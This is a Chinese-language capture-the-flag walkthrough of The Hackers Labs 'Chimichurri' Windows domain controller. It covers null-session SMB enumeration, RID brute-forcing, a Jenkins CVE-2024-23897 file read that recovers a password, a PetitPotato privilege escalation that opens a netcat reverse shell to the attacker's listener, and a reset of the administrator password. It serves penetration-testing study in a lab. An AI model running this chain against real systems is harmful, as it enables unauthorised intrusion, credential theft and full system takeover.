靶场:The Hackers Labs
地址:https://thehackerslabs.com/chimichurri/
系统:windows
内容:smb信息检索、jenkins漏洞利用、SeImpersonatePrivilege提权
这个机器在我的virtualbox上不识别网络,还是用的vmware跑的。
扫一下端口,开了smb、还有个jenkins在6969。
─$ nmap -sV -sC -Pn -p- -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 16:29 CST
Nmap scan report for 192.168.56.152
Host is up (0.0020s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-08 14:30:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6969/tcp open http Jetty 10.0.11
|_http-title: Panel de control [Jenkins]
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.11)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:30:56:DF (VMware)
Service Info: Host: CHIMICHURRI; OS: Windows; CPE: cpe:/o:microsoft:windows
查一下smb权限,默认就可以读取drogas目录。
└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB 192.168.56.152 445 CHIMICHURRI [*] Windows 10 / Server 2016 Build 14393 x64 (name:CHIMICHURRI) (domain:chimichurri.thl) (signing:True) (SMBv1:False)
SMB 192.168.56.152 445 CHIMICHURRI [+] chimichurri.thl\null:
SMB 192.168.56.152 445 CHIMICHURRI [+] Enumerated shares
SMB 192.168.56.152 445 CHIMICHURRI Share Permissions Remark
SMB 192.168.56.152 445 CHIMICHURRI ----- ----------- ------
SMB 192.168.56.152 445 CHIMICHURRI ADMIN$ Admin remota
SMB 192.168.56.152 445 CHIMICHURRI C$ Recurso predeterminado
SMB 192.168.56.152 445 CHIMICHURRI drogas READ
SMB 192.168.56.152 445 CHIMICHURRI IPC$ READ IPC remota
SMB 192.168.56.152 445 CHIMICHURRI NETLOGON Recurso compartido del servidor de inicio de sesión
SMB 192.168.56.152 445 CHIMICHURRI SYSVOL Recurso compartido del servidor de inicio de sesión
以空账户登录smb,下载一个关于账号的文件。
└─$ smbclient //$IP/drogas -U 'null'
Password for [WORKGROUP\null]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jun 27 18:20:49 2024
.. D 0 Thu Jun 27 18:20:49 2024
credenciales.txt A 95 Mon Jul 1 01:19:03 2024
7735807 blocks of size 4096. 4368143 blocks available
smb: \> get credenciales.txt
getting file \credenciales.txt of size 95 as credenciales.txt (4.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)
查看下载的credenciales.txt的内容,得知了一个用户名hacker,在桌面保存了一个名为perico的文件。
└─$ cat credenciales.txt
Todo es mejor en con el usuario hacker, en su escritorio estan sus claves de acceso como perico
查看一下有多少用户,其中就有刚才文件里提到的hacker。
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute
SMB 192.168.56.152 445 CHIMICHURRI [*] Windows 10 / Server 2016 Build 14393 x64 (name:CHIMICHURRI) (domain:chimichurri.thl) (signing:True) (SMBv1:False)
SMB 192.168.56.152 445 CHIMICHURRI [+] chimichurri.thl\anonymous: (Guest)
SMB 192.168.56.152 445 CHIMICHURRI 498: CHIMICHURRI0\Enterprise Domain Controllers de sólo lectura (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 500: CHIMICHURRI0\Administrador (SidTypeUser)
SMB 192.168.56.152 445 CHIMICHURRI 501: CHIMICHURRI0\Invitado (SidTypeUser)
SMB 192.168.56.152 445 CHIMICHURRI 502: CHIMICHURRI0\krbtgt (SidTypeUser)
SMB 192.168.56.152 445 CHIMICHURRI 503: CHIMICHURRI0\DefaultAccount (SidTypeUser)
SMB 192.168.56.152 445 CHIMICHURRI 512: CHIMICHURRI0\Admins. del dominio (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 513: CHIMICHURRI0\Usuarios del dominio (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 514: CHIMICHURRI0\Invitados del dominio (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 515: CHIMICHURRI0\Equipos del dominio (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 516: CHIMICHURRI0\Controladores de dominio (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 517: CHIMICHURRI0\Publicadores de certificados (SidTypeAlias)
SMB 192.168.56.152 445 CHIMICHURRI 518: CHIMICHURRI0\Administradores de esquema (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 519: CHIMICHURRI0\Administradores de empresas (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 520: CHIMICHURRI0\Propietarios del creador de directivas de grupo (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 521: CHIMICHURRI0\Controladores de dominio de sólo lectura (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 522: CHIMICHURRI0\Controladores de dominio clonables (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 525: CHIMICHURRI0\Protected Users (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 526: CHIMICHURRI0\Administradores clave (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 527: CHIMICHURRI0\Administradores clave de la organización (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 553: CHIMICHURRI0\Servidores RAS e IAS (SidTypeAlias)
SMB 192.168.56.152 445 CHIMICHURRI 571: CHIMICHURRI0\Grupo de replicación de contraseña RODC permitida (SidTypeAlias)
SMB 192.168.56.152 445 CHIMICHURRI 572: CHIMICHURRI0\Grupo de replicación de contraseña RODC denegada (SidTypeAlias)
SMB 192.168.56.152 445 CHIMICHURRI 1000: CHIMICHURRI0\hacker (SidTypeUser)
SMB 192.168.56.152 445 CHIMICHURRI 1001: CHIMICHURRI0\CHIMICHURRI$ (SidTypeUser)
SMB 192.168.56.152 445 CHIMICHURRI 1102: CHIMICHURRI0\DnsAdmins (SidTypeAlias)
SMB 192.168.56.152 445 CHIMICHURRI 1103: CHIMICHURRI0\DnsUpdateProxy (SidTypeGroup)
SMB 192.168.56.152 445 CHIMICHURRI 1107: CHIMICHURRI0\Remote Mangement Users (SidTypeGroup)
下面要利用jenkins的漏洞来读取文件。在exploit-db搜索一下,有个可用的CVE。
利用代码在https://github.com/godylockz/CVE-2024-23897
可以下载。由于不知道扩展名,我们利用脚本进行循环查找,最后发现是.txt文件。
└─$ while IFS= read -r line; do echo -n "perico.$line ";python3 jenkins_fileread.py -u $IP:6969 -f c:/Users/Hacker/Desktop/perico.$line ; done < /usr/share/seclists/Fuzzing/
extensions-most-common.fuzz.txt
perico.asp File does not exist
perico.aspx File does not exist
perico.phar File does not exist
perico.php File does not exist
perico.php3 File does not exist
perico.php4 File does not exist
perico.php5 File does not exist
perico.txt hacker:Perico69
perico.shtm File does not exist
perico.shtml File does not exist
perico.phtm File does not exis
利用得到的用户名和密码,登录shell,查看权限。
└─$ evil-winrm -i $IP -u hacker -p Perico69
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hacker\Documents> whoami /priv
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= ============================================ ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticaci¢n Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
问了下gpt,看来要利用SeImpersonatePrivilege权限提权。
在这三个权限中,SeImpersonatePrivilege 可以被滥用来提升普通用户权限。
权限解释
SeMachineAccountPrivilege
允许用户添加计算机账户到域中。
主要适用于域控制环境,与权限提升关系不大。
SeImpersonatePrivilege
允许用户模拟其他用户的安全上下文(即扮演其他用户的身份)。
在某些情况下,特别是在服务进程或本地系统账户中运行的应用程序上,可能存在已知漏洞,允许攻击者利用此权限来获得更高权限(例如 NT AUTHORITY\SYSTEM 权限)。
一些常见的利用工具(如 Juicy Potato、Rogue Potato、PrintSpoofer 等)会利用这种权限来进行提权操作。
SeIncreaseWorkingSetPrivilege
允许用户调整进程的工作集大小(内存管理方面的权限)。
该权限与内存优化相关,不直接涉及权限提升。
SeImpersonatePrivilege权限的利用,都是各种以Potato结尾的代码,试了一圈,就这个好使。
https://github.com/wh0amitz/PetitPotato
*Evil-WinRM* PS C:\Users\hacker\Documents> .\PetitPotato.exe 3 "nc64.exe 192.168.56.101 1234 -e cmd"
[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[+] CreateProcessAsUser OK.
本地监听,得到反弹shell。
─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.152] 50012
Microsoft Windows [Versin 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
这时还不能直接读取flag,因为文件权限设定是只有Administrator能读取。可以修改administrator(注意西班牙语的名称)的密码。
c:\Users\hacker\Desktop>net user administrador Pass1234!
net user administrador Pass1234!
Se ha completado el comando correctamente.
└─$ evil-winrm -i $IP -u administrador -p Pass1234!
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrador\Documents> whoami
chimichurri0\administrador